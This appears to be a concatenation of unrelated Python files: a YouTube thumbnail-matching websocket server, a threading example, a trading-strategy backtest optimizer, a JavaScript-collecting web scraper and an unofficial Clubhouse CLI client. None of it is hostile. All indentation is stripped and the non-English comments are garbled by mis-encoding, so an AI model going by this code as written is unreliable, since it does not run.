"message_ja": "ใตใ ใใคใซ็ปๅใใใฆใณใญใผใใใฆใใพใ..."
})
await asyncio.sleep(1)
# Process 4 : Whether download thumbnail image
if not downloadThumbnail(vid):
print("[4] Download thumbnail image failed.")
await ws.send_json({
"status": False,
"process_code": 4,
"message": "Download thumbnail image failed.",
"message_ja": "ใตใ ใใคใซ็ปๅใฎใใฆใณใญใผใใซๅคฑๆใใพใใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[4] Download thumbnail image completed.")
await ws.send_json({
"status": True,
"process_code": 4,
"message": "Download thumbnail image completed.",
"message_ja": "ใตใ ใใคใซ็ปๅใฎใใฆใณใญใผใใซๆๅใใพใใใ"
})
await asyncio.sleep(1)
# Process 5 : Download video
print("[5] Downloading video...")
await ws.send_json({
"status": True,
"process_code": 5,
"message": "Downloading video...",
"message_ja": "ๅ็ปใใใฆใณใญใผใใใฆใใพใ..."
})
await asyncio.sleep(1)
# Process 6 : Whether download video
dlResult = downloadVideo(vid)
if isinstance(dlResult, Exception):
print("[6] Download video failed.")
await ws.send_json({
"status": False,
"process_code": 6,
"message": "Download video failed. <code>{}</code>".format(str(dlResult)),
"message_ja": "ๅ็ปใฎใใฆใณใญใผใใซๅคฑๆใใพใใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[6] Download video completed.")
await ws.send_json({
"status": True,
"process_code": 6,
"message": "Download video completed.",
"message_ja": "ๅ็ปใฎใใฆใณใญใผใใซๆๅใใพใใใ"
})
await asyncio.sleep(1)
# Process 7 : Convert video to image
print("[7] Converting video to image...")
await ws.send_json({
"status": True,
"process_code": 7,
"message": "Converting video to image...",
"message_ja": "ๅ็ปใใ็ปๅใซๅคๆใใฆใใพใ..."
})
await asyncio.sleep(1)
# Process 8 : Whether download video
convResult = convertVideoToImage(vid)
if isinstance(convResult, Exception):
print("[8] Convert video to image failed.")
await ws.send_json({
"status": False,
"process_code": 8,
"message": "Convert video to image failed. <code>{}</code>".format(str(convResult)),
"message_ja": "ๅ็ปใใ็ปๅใธใฎๅคๆใซๅคฑๆใใพใใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[8] Convert video to image completed.")
await ws.send_json({
"status": True,
"process_code": 8,
"message": "Convert video to image completed.",
"message_ja": "ๅ็ปใใ็ปๅใธใฎๅคๆใซๆๅใใพใใใ"
})
await asyncio.sleep(1)
# Process 9 : Finding a scene that looks like a thumbnail
print("[9] Finding a scene that looks like a thumbnail...")
await ws.send_json({
"status": True,
"process_code": 9,
"message": "Finding a scene that looks like a thumbnail...",
"message_ja": "ใตใ ใใคใซ็ปๅใซๅใใทใผใณใๆขใใฆใใพใ..."
})
await asyncio.sleep(1)
# Process 10 : Whether find a scene that looks like a thumbnail
similars = findThumbnail(vid)
if len(similars) == 0:
print("[10] Not found a scene that looks like a thumbnail.")
await ws.send_json({
"status": False,
"process_code": 10,
"message": "Not found a scene that looks like a thumbnail.",
"message_ja": "ใตใ ใใคใซ็ปๅใซๅใใทใผใณใ่ฆใคใใใพใใใงใใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[10] All Completed. ")
best_image = getImageBase64(vid, next(iter(similars))[0])
print("[10] Base64 converted. ")
await ws.send_json({
"status": True,
"process_code": 10,
"message": "All Completed.",
"message_ja": "ๅ
จใฆใฎๅฆ็ใๅฎไบใใพใใใ",
"vid": vid,
"data": {
"best": next(iter(similars)),
"similars": similars
},
"best_image": best_image
})
await asyncio.sleep(1)
print("- Process finished.")
except:
await ws.close()
del clients[key]
def awake():
while True:
try:
print("Start Awaking")
requests.get("https://yfts.herokuapp.com/")
print("End")
except:
print("error")
time.sleep(300)
t = threading.Thread(target=awake)
t.setDaemon(True)
t.start()
api.run(address="0.0.0.0", port=int(os.environ.get("PORT", 5000)), workers=1)
|
threading_local_defaults.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Defaults for thread-local values
"""
#end_pymotw_header
import random
import threading
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def show_value(data):
try:
val = data.value
except AttributeError:
logging.debug('No value yet')
else:
logging.debug('value=%s', val)
def worker(data):
show_value(data)
data.value = random.randint(1, 100)
show_value(data)
class MyLocal(threading.local):
def __init__(self, value):
logging.debug('Initializing %r', self)
self.value = value
local_data = MyLocal(1000)
show_value(local_data)
for i in range(2):
t = threading.Thread(target=worker, args=(local_data,))
t.start()
|
WtCtaOptimizer.py
|
from json import encoder
import multiprocessing
import time
import threading
import json
import os
import math
import numpy as np
import pandas as pd
from pandas import DataFrame as df
from wtpy import WtBtEngine,EngineType
from wtpy.apps import WtBtAnalyst
def fmtNAN(val, defVal = 0):
if math.isnan(val):
return defVal
return val
class ParamInfo:
'''
ๅๆฐไฟกๆฏ็ฑป
'''
def __init__(self, name:str, start_val = None, end_val = None, step_val = None, ndigits = 1, val_list:list = None):
self.name = name #ๅๆฐๅ
self.start_val = start_val #่ตทๅงๅผ
self.end_val = end_val #็ปๆๅผ
self.step_val = step_val #ๅๅๆญฅ้ฟ
self.ndigits = ndigits #ๅฐๆฐไฝ
self.val_list = val_list #ๆๅฎๅๆฐ
def gen_array(self):
if self.val_list is not None:
return self.val_list
values = list()
curVal = round(self.start_val, self.ndigits)
while curVal < self.end_val:
values.append(curVal)
curVal += self.step_val
curVal = round(curVal, self.ndigits)
if curVal >= self.end_val:
curVal = self.end_val
break
values.append(round(curVal, self.ndigits))
return values
class WtCtaOptimizer:
'''
ๅๆฐไผๅๅจ\n
ไธป่ฆ็จไบๅ็ญ็ฅๅๆฐไผๅ็
'''
def __init__(self, worker_num:int = 8):
'''
ๆ้ ๅฝๆฐ\n
@worker_num ๅทฅไฝ่ฟ็จไธชๆฐ๏ผ้ป่ฎคไธบ8๏ผๅฏไปฅๆ นๆฎCPUๆ ธๅฟๆฐ่ฎพ็ฝฎ
'''
self.worker_num = worker_num
self.running_worker = 0
self.mutable_params = dict()
self.fixed_params = dict()
self.env_params = dict()
self.cpp_stra_module = None
return
def add_mutable_param(self, name:str, start_val, end_val, step_val, ndigits = 1):
'''
ๆทปๅ ๅฏๅๅๆฐ\n
@name ๅๆฐๅ\n
@start_val ่ตทๅงๅผ\n
@end_val ็ปๆๅผ\n
@step_val ๆญฅ้ฟ\n
@ndigits ๅฐๆฐไฝ
'''
self.mutable_params[name] = ParamInfo(name=name, start_val=start_val, end_val=end_val, step_val=step_val, ndigits=ndigits)
def add_listed_param(self, name:str, val_list:list):
'''
ๆทปๅ ้ๅฎ่ๅด็ๅฏๅๅๆฐ\n
@name ๅๆฐๅ\n
@val_list ๅๆฐๅผๅ่กจ
'''
self.mutable_params[name] = ParamInfo(name=name, val_list=val_list)
def add_fixed_param(self, name:str, val):
'''
ๆทปๅ ๅบๅฎๅๆฐ\n
@name ๅๆฐๅ\n
@val ๅผ\n
'''
self.fixed_params[name] = val
return
def set_strategy(self, typeName:type, name_prefix:str):
'''
่ฎพ็ฝฎ็ญ็ฅ\n
@typeName ็ญ็ฅ็ฑปๅ\n
@name_prefix ๅฝๅๅ็ผ๏ผ็จไบ่ชๅจๅฝๅ็จ๏ผไธ่ฌไธบๆ ผๅผไธบ"ๅ็ผ_ๅๆฐ1ๅ_ๅๆฐ1ๅผ_ๅๆฐ2ๅ_ๅๆฐ2ๅผ"
'''
self.strategy_type = typeName
self.name_prefix = name_prefix
return
def set_cpp_strategy(self, module:str, type_name:type, name_prefix:str):
'''
่ฎพ็ฝฎCPP็ญ็ฅ\n
@module ๆจกๅๆไปถ\n
@typeName ็ญ็ฅ็ฑปๅ\n
@name_prefix ๅฝๅๅ็ผ๏ผ็จไบ่ชๅจๅฝๅ็จ๏ผไธ่ฌไธบๆ ผๅผไธบ"ๅ็ผ_ๅๆฐ1ๅ_ๅๆฐ1ๅผ_ๅๆฐ2ๅ_ๅๆฐ2ๅผ"
'''
self.cpp_stra_module = module
self.cpp_stra_type = type_name
self.name_prefix = name_prefix
return
def config_backtest_env(self, deps_dir:str, cfgfile:str="configbt.json", storage_type:str="csv", storage_path:str = None, db_config:dict = None):
'''
้
็ฝฎๅๆต็ฏๅข\n
@deps_dir ไพ่ตๆไปถ็ฎๅฝ\n
@cfgfile ้
็ฝฎๆไปถๅ\n
@storage_type ๅญๅจ็ฑปๅ๏ผcsv/bin็ญ\n
@storage_path ๅญๅจ่ทฏๅพ
'''
self.env_params["deps_dir"] = deps_dir
self.env_params["cfgfile"] = cfgfile
self.env_params["storage_type"] = storage_type
if storage_path is None and db_config is None:
raise Exception("storage_path and db_config cannot be both None!")
if storage_type == 'db' and db_config is None:
raise Exception("db_config cannot be None while storage_type is db!")
self.env_params["storage_path"] = storage_path
self.env_params["db_config"] = db_config
def config_backtest_time(self, start_time:int, end_time:int):
'''
้
็ฝฎๅๆตๆถ้ด๏ผๅฏๅคๆฌก่ฐ็จ้
็ฝฎๅคไธชๅๆตๆถ้ดๅบ้ด\n
@start_time ๅผๅงๆถ้ด๏ผ็ฒพ็กฎๅฐๅ้๏ผๆ ผๅผๅฆ201909100930\n
@end_time ็ปๆๆถ้ด๏ผ็ฒพ็กฎๅฐๅ้๏ผๆ ผๅผๅฆ201909100930
'''
if "time_ranges" not in self.env_params:
self.env_params["time_ranges"] = []
self.env_params["time_ranges"].append([start_time,end_time])
def __gen_tasks__(self, markerfile:str = "strategies.json"):
'''
็ๆๅๆตไปปๅก
'''
param_names = self.mutable_params.keys()
param_values = dict()
# ๅ
็ๆๅไธชๅๆฐ็ๅ้ๆฐ็ป
# ๅนถ่ฎก็ฎๆป็ๅๆฐๆๅคๅฐ็ป
total_groups = 1
for name in param_names:
paramInfo = self.mutable_params[name]
values = paramInfo.gen_array()
param_values[name] = values
total_groups *= len(values)
#ๅ็ๆๆ็ปๆฏไธ็ป็ๅๆฐdict
param_groups = list()
stra_names = dict()
time_ranges = self.env_params["time_ranges"]
for time_range in time_ranges:
start_time = time_range[0]
end_time = time_range[1]
for i in range(total_groups):
k = i
thisGrp = self.fixed_params.copy() #ๅคๅถๅบๅฎๅๆฐ
endix = ''
for name in param_names:
cnt = len(param_values[name])
curVal = param_values[name][k%cnt]
tname = type(curVal)
if tname.__name__ == "list":
val_str = ''
for item in curVal:
val_str += str(item)
val_str += "_"
val_str = val_str[:-1]
thisGrp[name] = curVal
endix += name
endix += "_"
endix += val_str
endix += "_"
else:
thisGrp[name] = curVal
endix += name
endix += "_"
endix += str(curVal)
endix += "_"
k = math.floor(k / cnt)
endix = endix[:-1]
straName = self.name_prefix + endix
straName += "_%d_%d" % (start_time, end_time)
thisGrp["name"] = straName
thisGrp["start_time"] = start_time
thisGrp["end_time"] = end_time
stra_names[straName] = thisGrp
param_groups.append(thisGrp)
# ๅฐๆฏไธ็ปๅๆฐๅๅฏนๅบ็็ญ็ฅID่ฝๅฐๅฐๆไปถไธญ๏ผๆนไพฟๅ็ปญ็ๅๆ
f = open(markerfile, "w")
f.write(json.dumps(obj=stra_names, sort_keys=True, indent=4))
f.close()
return param_groups
def __ayalyze_result__(self, strName:str, time_range:tuple, params:dict):
folder = "./outputs_bt/%s/" % (strName)
df_closes = pd.read_csv(folder + "closes.csv")
df_funds = pd.read_csv(folder + "funds.csv")
df_wins = df_closes[df_closes["profit"]>0]
df_loses = df_closes[df_closes["profit"]<=0]
ay_WinnerBarCnts = df_wins["closebarno"]-df_wins["openbarno"]
ay_LoserBarCnts = df_loses["closebarno"]-df_loses["openbarno"]
total_winbarcnts = ay_WinnerBarCnts.sum()
total_losebarcnts = ay_LoserBarCnts.sum()
total_fee = df_funds.iloc[-1]["fee"]
totaltimes = len(df_closes) # ๆปไบคๆๆฌกๆฐ
wintimes = len(df_wins) # ็ๅฉๆฌกๆฐ
losetimes = len(df_loses) # ไบๆๆฌกๆฐ
winamout = df_wins["profit"].sum() #ๆฏ็ๅฉ
loseamount = df_loses["profit"].sum() #ๆฏไบๆ
trdnetprofit = winamout + loseamount #ไบคๆๅ็ไบ
accnetprofit = trdnetprofit - total_fee #่ดฆๆทๅ็ไบ
winrate = wintimes / totaltimes if totaltimes>0 else 0 # ่็
avgprof = trdnetprofit/totaltimes if totaltimes>0 else 0 # ๅๆฌกๅนณๅ็ไบ
avgprof_win = winamout/wintimes if wintimes>0 else 0 # ๅๆฌก็ๅฉๅๅผ
avgprof_lose = loseamount/losetimes if losetimes>0 else 0 # ๅๆฌกไบๆๅๅผ
winloseratio = abs(avgprof_win/avgprof_lose) if avgprof_lose!=0 else "N/A" # ๅๆฌก็ไบๅๅผๆฏ
max_consecutive_wins = 0 # ๆๅคง่ฟ็ปญ็ๅฉๆฌกๆฐ
max_consecutive_loses = 0 # ๆๅคง่ฟ็ปญไบๆๆฌกๆฐ
avg_bars_in_winner = total_winbarcnts/wintimes if wintimes>0 else "N/A"
avg_bars_in_loser = total_losebarcnts/losetimes if losetimes>0 else "N/A"
consecutive_wins = 0
consecutive_loses = 0
for idx, row in df_closes.iterrows():
profit = row["profit"]
if profit > 0:
consecutive_wins += 1
consecutive_loses = 0
else:
consecutive_wins = 0
consecutive_loses += 1
max_consecutive_wins = max(max_consecutive_wins, consecutive_wins)
max_consecutive_loses = max(max_consecutive_loses, consecutive_loses)
summary = params.copy()
summary["ๅผๅงๆถ้ด"] = time_range[0]
summary["็ปๆๆถ้ด"] = time_range[1]
summary["ๆปไบคๆๆฌกๆฐ"] = totaltimes
summary["็ๅฉๆฌกๆฐ"] = wintimes
summary["ไบๆๆฌกๆฐ"] = losetimes
summary["ๆฏ็ๅฉ"] = float(winamout)
summary["ๆฏไบๆ"] = float(loseamount)
summary["ไบคๆๅ็ไบ"] = float(trdnetprofit)
summary["่็"] = winrate*100
summary["ๅๆฌกๅนณๅ็ไบ"] = avgprof
summary["ๅๆฌก็ๅฉๅๅผ"] = avgprof_win
summary["ๅๆฌกไบๆๅๅผ"] = avgprof_lose
summary["ๅๆฌก็ไบๅๅผๆฏ"] = winloseratio
summary["ๆๅคง่ฟ็ปญ็ๅฉๆฌกๆฐ"] = max_consecutive_wins
summary["ๆๅคง่ฟ็ปญไบๆๆฌกๆฐ"] = max_consecutive_loses
summary["ๅนณๅ็ๅฉๅจๆ"] = avg_bars_in_winner
summary["ๅนณๅไบๆๅจๆ"] = avg_bars_in_loser
summary["ๅนณๅ่ดฆๆทๆถ็็"] = accnetprofit/totaltimes
f = open(folder+"summary.json", mode="w")
f.write(json.dumps(obj=summary, indent=4))
f.close()
return
def __execute_task__(self, params:dict):
'''
ๆง่กๅไธชๅๆตไปปๅก\n
@params kvๅฝขๅผ็ๅๆฐ
'''
name = params["name"]
f = open("logcfg_tpl.json", "r")
content =f.read()
f.close()
content = content.replace("$NAME$", name)
engine = WtBtEngine(eType=EngineType.ET_CTA, logCfg=content, isFile=False)
engine.init(self.env_params["deps_dir"], self.env_params["cfgfile"])
engine.configBacktest(params["start_time"], params["end_time"])
engine.configBTStorage(mode=self.env_params["storage_type"], path=self.env_params["storage_path"], dbcfg=self.env_params["db_config"])
time_range = (params["start_time"], params["end_time"])
# ๅปๆๅคไฝ็ๅๆฐ
params.pop("start_time")
params.pop("end_time")
if self.cpp_stra_module is not None:
params.pop("name")
engine.setExternalCtaStrategy(name, self.cpp_stra_module, self.cpp_stra_type, params)
else:
straInfo = self.strategy_type(**params)
engine.set_cta_strategy(straInfo)
engine.commitBTConfig()
engine.run_backtest()
engine.release_backtest()
self.__ayalyze_result__(name, time_range, params)
def __start_task__(self, params:dict):
'''
ๅฏๅจๅไธชๅๆตไปปๅก\n
่ฟ้็จ็บฟ็จๅฏๅจๅญ่ฟ็จ็็ฎ็ๆฏไธบไบๅฏไปฅๆงๅถๆป็ๅทฅไฝ่ฟ็จไธชๆฐ\n
ๅฏไปฅๅจ็บฟ็จไธญjoin็ญๅพ
ๅญ่ฟ็จ็ปๆ๏ผๅๆดๆฐrunning_workerๅ้\n
ๅฆๆๅจ__execute_task__ไธญไฟฎๆนrunning_worker๏ผๅ ไธบๅจไธๅ่ฟ็จไธญ๏ผๆฐๆฎๅนถไธๅๆญฅ\n
@params kvๅฝขๅผ็ๅๆฐ
'''
p = multiprocessing.Process(target=self.__execute_task__, args=(params,))
p.start()
p.join()
self.running_worker -= 1
print("ๅทฅไฝ่ฟ็จ%dไธช" % (self.running_worker))
def go(self, interval:float = 0.2, out_marker_file:str = "strategies.json", out_summary_file:str = "total_summary.csv"):
'''
ๅฏๅจไผๅๅจ\n
@interval ๆถ้ด้ด้๏ผๅไฝ็ง
@markerfile ๆ ่ฎฐๆไปถๅ๏ผๅๆตๅฎๆไปฅๅๅๆไผ็จๅฐ
'''
self.tasks = self.__gen_tasks__(out_marker_file)
self.running_worker = 0
total_task = len(self.tasks)
left_task = total_task
while True:
if left_task == 0:
break
if self.running_worker < self.worker_num:
params = self.tasks[total_task-left_task]
left_task -= 1
print("ๅฉไฝไปปๅก%dไธช" % (left_task))
p = threading.Thread(target=self.__start_task__, args=(params,))
p.start()
self.running_worker += 1
print("ๅทฅไฝ่ฟ็จ%dไธช" % (self.running_worker))
else:
time.sleep(interval)
#ๆๅ๏ผๅ
จ้จไปปๅก้ฝๅทฒ็ปๅฏๅจๅฎไบ๏ผๅ็ญๅพ
ๆๆๅทฅไฝ่ฟ็จ็ปๆ
while True:
if self.running_worker == 0:
break
else:
time.sleep(interval)
#ๅผๅงๆฑๆปๅๆต็ปๆ
f = open(out_marker_file, "r")
content = f.read()
f.close()
obj_stras = json.loads(content)
total_summary = list()
for straName in obj_stras:
filename = "./outputs_bt/%s/summary.json" % (straName)
if not os.path.exists(filename):
print("%sไธๅญๅจ๏ผ่ฏทๆฃๆฅๆฐๆฎ" % (filename))
continue
f = open(filename, "r")
content = f.read()
f.close()
obj_summary = json.loads(content)
total_summary.append(obj_summary)
df_summary = df(total_summary)
# df_summary = df_summary.drop(labels=["name"], axis='columns')
df_summary.to_csv(out_summary_file, encoding='utf-8-sig')
def analyze(self, out_marker_file:str = "strategies.json", out_summary_file:str = "total_summary.csv"):
#ๅผๅงๆฑๆปๅๆต็ปๆ
f = open(out_marker_file, "r")
content = f.read()
f.close()
total_summary = list()
obj_stras = json.loads(content)
for straName in obj_stras:
params = obj_stras[straName]
filename = "./outputs_bt/%s/summary.json" % (straName)
if not os.path.exists(filename):
print("%sไธๅญๅจ๏ผ่ฏทๆฃๆฅๆฐๆฎ" % (filename))
continue
time_range = (params["start_time"],params["end_time"])
self.__ayalyze_result__(straName, time_range, params)
f = open(filename, "r")
content = f.read()
f.close()
obj_summary = json.loads(content)
total_summary.append(obj_summary)
df_summary = df(total_summary)
df_summary = df_summary.drop(labels=["name"], axis='columns')
df_summary.to_csv(out_summary_file)
def analyzer(self, out_marker_file:str = "strategies.json", init_capital=500000, rf=0.02, annual_trading_days=240):
for straname in json.load(open(out_marker_file, mode='r')).keys():
try:
analyst = WtBtAnalyst()
analyst.add_strategy(straname, folder="./outputs_bt/%s/"%straname, init_capital=init_capital, rf=rf, annual_trading_days=annual_trading_days)
analyst.run()
except:
pass
|
collectCode.py
|
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
import re
import time
import argparse
from collectSources import get_sources
import utils
import multiprocessing
globals_ = utils.load_globals()
def get_url_javascript(url, driver, response):
""" Get code from a website
Args:
url (str): url of the website
driver (Chrome driver): Chrome driver used to visit the site
response (boolean) : Return value to represent if the operation was successful or not
"""
response = True
try:
urlName = utils.get_url_name(url)
outputDir = globals_['COLLECT_WEB_OUTPUT_DIR'] + urlName
utils.make_dir(outputDir)
time.sleep(2)
driver.get(url)
time.sleep(5)
# get the HTML content
html = driver.page_source
#parse HTML using beautiful soup
soup = bs(html, "html.parser")
scripts = soup.find_all("script")
extension = ".js"
scriptNr = 0
for script in scripts:
src = script.attrs.get("src")
type_ = script.attrs.get("type")
if not type_ or type_ == "text/javascript" or type_ == "application/javascript":
if src:
ref = urljoin(url, src)
minified = re.match(r'\.min\.js', ref)
if minified:
extension = ".min.js"
outputFileDir = outputDir + globals_['DIR_SEPARATOR'] + urlName + globals_['DEFAULT_SEPARATOR'] + str(scriptNr) + globals_['DEFAULT_SEPARATOR'] + "ref" + extension
utils.download_url_javascript(ref, outputFileDir)
else:
outputFileDir = outputDir + globals_['DIR_SEPARATOR'] + urlName + globals_['DEFAULT_SEPARATOR'] + str(scriptNr) + globals_['DEFAULT_SEPARATOR'] + "inline" + extension
utils.write_to_file(outputFileDir, script.string)
scriptNr += 1
utils.write_to_log_on_success(url, globals_['COLLECT_WEB_LOG_FILE_DIR'])
except Exception as e:
utils.write_to_log_on_failure(url, globals_['COLLECT_WEB_LOG_FILE_DIR'], str(e))
response = False
if driver != "":
driver.quit()
def scrap_web(number_urls, start_at):
""" Get code from websites
Args:
number_urls (int): number of sites to visit
start_at (int): index in urlsToVsit.txt list of the first site to visit
"""
urlsToVisit = utils.get_urls_to_visit()
if start_at > number_urls:
print("Invalid starting point. start_at must be lower or equal to " + str(len(urlsToVisit)))
return
failCount = 0
startIndex = start_at-1
if start_at+number_urls-1 >= len(urlsToVisit):
endIndex = len(urlsToVisit)
else:
endIndex = start_at+number_urls-1
urlsToVisit = urlsToVisit[startIndex:endIndex]
for url in urlsToVisit:
if failCount > 10:
print("Failed too much")
break
response = True
try:
driver = utils.setup_driver()
except Exception:
driver = ""
p = multiprocessing.Process(target=get_url_javascript, name="get_url_javascript", args=(url,driver, response))
p.start()
p.join(5*60)
if p.is_alive():
p.terminate()
p.join()
utils.write_to_log_on_failure(url, globals_['COLLECT_WEB_LOG_FILE_DIR'], "Process killed due to timeout.")
driver.quit()
if not response:
failCount += 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--collect_option", type=str)
parser.add_argument("--number_urls", type=str)
parser.add_argument("--start_at", type=str)
args = parser.parse_args()
number_urls = int(args.number_urls)
start_at = int(args.start_at)
if(args.collect_option == "code"):
scrap_web(number_urls, start_at)
if(args.collect_option == "sources"):
get_sources(number_urls, start_at)
|
cli.py
|
"""
cli.py
Sample CLI Clubhouse Client
RTC: For voice communication
"""
import os
import sys
import threading
import configparser
import keyboard
from rich.table import Table
from rich.console import Console
from clubhouse.clubhouse import Clubhouse
# Set some global variables
try:
import agorartc
RTC = agorartc.createRtcEngineBridge()
eventHandler = agorartc.RtcEngineEventHandlerBase()
RTC.initEventHandler(eventHandler)
# 0xFFFFFFFE will exclude Chinese servers from Agora's servers.
RTC.initialize(Clubhouse.AGORA_KEY, None, agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)
# Enhance voice quality
if RTC.setAudioProfile(
agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,
agorartc.AUDIO_SCENARIO_GAME_STREAMING
) < 0:
print("[-] Failed to set the high quality audio profile")
except ImportError:
RTC = None
def set_interval(interval):
""" (int) -> decorator
set_interval decorator
"""
def decorator(func):
def wrap(*args, **kwargs):
stopped = threading.Event()
def loop():
while not stopped.wait(interval):
ret = func(*args, **kwargs)
if not ret:
break
thread = threading.Thread(target=loop)
thread.daemon = True
thread.start()
return stopped
return wrap
return decorator
def write_config(user_id, user_token, user_device, filename='setting.ini'):
""" (str, str, str, str) -> bool
Write Config. return True on successful file write
"""
config = configparser.ConfigParser()
config["Account"] = {
"user_device": user_device,
"user_id": user_id,
"user_token": user_token,
}
with open(filename, 'w') as config_file:
config.write(config_file)
return True
def read_config(filename='setting.ini'):
""" (str) -> dict of str
Read Config
"""
config = configparser.ConfigParser()
config.read(filename)
if "Account" in config:
return dict(config['Account'])
return dict()
def process_onboarding(client):
""" (Clubhouse) -> NoneType
This is to process the initial setup for the first time user.
"""
print("=" * 30)
print("Welcome to Clubhouse!\n")
print("The registration is not yet complete.")
print("Finish the process by entering your legal name and your username.")
print("WARNING: THIS FEATURE IS PURELY EXPERIMENTAL.")
print(" YOU CAN GET BANNED FOR REGISTERING FROM THE CLI ACCOUNT.")
print("=" * 30)
while True:
user_realname = input("[.] Enter your legal name (John Smith): ")
user_username = input("[.] Enter your username (elonmusk1234): ")
user_realname_split = user_realname.split(" ")
if len(user_realname_split) != 2:
print("[-] Please enter your legal name properly.")
continue
if not (user_realname_split[0].isalpha() and
user_realname_split[1].isalpha()):
print("[-] Your legal name is supposed to be written in alphabets only.")
continue
if len(user_username) > 16:
print("[-] Your username exceeds above 16 characters.")
continue
if not user_username.isalnum():
print("[-] Your username is supposed to be in alphanumerics only.")
continue
client.update_name(user_realname)
result = client.update_username(user_username)
if not result['success']:
print(f"[-] You failed to update your username. ({result})")
continue
result = client.check_waitlist_status()
if not result['success']:
print("[-] Your registration failed.")
print(f" It's better to sign up from a real device. ({result})")
continue
print("[-] Registration Complete!")
print(" Try registering by real device if this process pops again.")
break
def print_channel_list(client, max_limit=20):
""" (Clubhouse) -> NoneType
Print list of channels
"""
# Get channels and print out
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("")
table.add_column("channel_name", style="cyan", justify="right")
table.add_column("topic")
table.add_column("speaker_count")
channels = client.get_channels()['channels']
i = 0
for channel in channels:
i += 1
if i > max_limit:
break
_option = ""
_option += "\xEE\x85\x84" if channel['is_social_mode'] or channel['is_private'] else ""
table.add_row(
str(_option),
str(channel['channel']),
str(channel['topic']),
str(int(channel['num_speakers'])),
)
console.print(table)
def chat_main(client):
""" (Clubhouse) -> NoneType
Main function for chat
"""
max_limit = 100
channel_speaker_permission = False
_wait_func = None
_ping_func = None
def _request_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Raise hands for permissions
"""
if not channel_speaker_permission:
client.audience_reply(channel_name, True, False)
_wait_func = _wait_speaker_permission(client, channel_name, user_id)
print("[/] You've raised your hand. Wait for the moderator to give you the permission.")
@set_interval(30)
def _ping_keep_alive(client, channel_name):
""" (str) -> bool
Continue to ping alive every 30 seconds.
"""
client.active_ping(channel_name)
return True
@set_interval(10)
def _wait_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Function that runs when you've requested for a voice permission.
"""
# Get some random users from the channel.
_channel_info = client.get_channel(channel_name)
if _channel_info['success']:
for _user in _channel_info['users']:
if _user['user_id'] != user_id:
user_id = _user['user_id']
break
# Check if the moderator allowed your request.
res_inv = client.accept_speaker_invite(channel_name, user_id)
if res_inv['success']:
print("[-] Now you have a speaker permission.")
print(" Please re-join this channel to activate a permission.")
return False
return True
while True:
# Choose which channel to enter.
# Join the talk on success.
user_id = client.HEADERS.get("CH-UserID")
print_channel_list(client, max_limit)
channel_name = input("[.] Enter channel_name: ")
channel_info = client.join_channel(channel_name)
if not channel_info['success']:
# Check if this channel_name was taken from the link
channel_info = client.join_channel(channel_name, "link", "e30=")
if not channel_info['success']:
print(f"[-] Error while joining the channel ({channel_info['error_message']})")
continue
# List currently available users (TOP 20 only.)
# Also, check for the current user's speaker permission.
channel_speaker_permission = False
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("name")
table.add_column("is_speaker")
table.add_column("is_moderator")
users = channel_info['users']
i = 0
for user in users:
i += 1
if i > max_limit:
break
table.add_row(
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['is_speaker']),
str(user['is_moderator']),
)
# Check if the user is the speaker
if user['user_id'] == int(user_id):
channel_speaker_permission = bool(user['is_speaker'])
console.print(table)
# Check for the voice level.
if RTC:
token = channel_info['token']
RTC.joinChannel(token, channel_name, "", int(user_id))
else:
print("[!] Agora SDK is not installed.")
print(" You may not speak or listen to the conversation.")
# Activate pinging
client.active_ping(channel_name)
_ping_func = _ping_keep_alive(client, channel_name)
_wait_func = None
# Add raise_hands key bindings for speaker permission
# Sorry for the bad quality
if not channel_speaker_permission:
if sys.platform == "darwin": # OSX
_hotkey = "9"
elif sys.platform == "win32": # Windows
_hotkey = "ctrl+shift+h"
print(f"[*] Press [{_hotkey}] to raise your hands for the speaker permission.")
keyboard.add_hotkey(
_hotkey,
_request_speaker_permission,
args=(client, channel_name, user_id)
)
input("[*] Press [Enter] to quit conversation.\n")
keyboard.unhook_all()
# Safely leave the channel upon quitting the channel.
if _ping_func:
_ping_func.set()
if _wait_func:
_wait_func.set()
if RTC:
RTC.leaveChannel()
client.leave_channel(channel_name)
def user_authentication(client):
""" (Clubhouse) -> NoneType
Just for authenticating the user.
"""
result = None
while True:
user_phone_number = input("[.] Please enter your phone number. (+818043217654) > ")
result = client.start_phone_number_auth(user_phone_number)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
result = None
while True:
verification_code = input("[.] Please enter the SMS verification code (1234, 0000, ...) > ")
result = client.complete_phone_number_auth(user_phone_number, verification_code)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
user_id = result['user_profile']['user_id']
user_token = result['auth_token']
user_device = client.HEADERS.get("CH-DeviceId")
write_config(user_id, user_token, user_device)
print("[.] Writing configuration file complete.")
if result['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Authenticate user first and start doing something
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
if result['is_onboarding']:
process_onboarding(client)
return
def main():
"""
Initialize required configurations, start with some basic stuff.
"""
# Initialize configuration
client = None
user_config = read_config()
user_id = user_config.get('user_id')
user_token = user_config.get('user_token')
user_device = user_config.get('user_device')
# Check if user is authenticated
if user_id and user_token and user_device:
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
# Check if user is still on the waitlist
_check = client.check_waitlist_status()
if _check['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Check if user has not signed up yet.
_check = client.me()
if not _check['user_profile'].get("username"):
process_onboarding(client)
